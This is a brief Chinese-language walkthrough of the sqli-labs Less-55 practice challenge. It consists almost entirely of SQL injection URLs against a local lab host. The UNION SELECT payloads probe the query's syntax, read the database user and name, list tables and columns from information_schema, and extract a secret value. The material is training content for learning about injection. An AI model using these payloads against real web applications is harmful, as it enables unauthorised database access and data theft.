【sqli-labs】 less55 GET -Challenge -Union -14 queries allowed -Variation1 (GET型 挑战 联合查询 只允许14次查询 变化2)

 

http://192.168.136.128/sqli-labs-master/Less-55/?id=1'

试了几次，整型带括号正常了

http://192.168.136.128/sqli-labs-master/Less-55/?id=1)%23

http://192.168.136.128/sqli-labs-master/Less-55/?id=0) union select 1,user(),database()%23

http://192.168.136.128/sqli-labs-master/Less-55/index.php?id=0) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23

http://192.168.136.128/sqli-labs-master/Less-55/index.php?id=0) union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='VDSRD0K3VJ'%23

http://192.168.136.128/sqli-labs-master/Less-55/index.php?id=0) union select 1,secret_61ZV,3 from VDSRD0K3VJ limit 0,1%23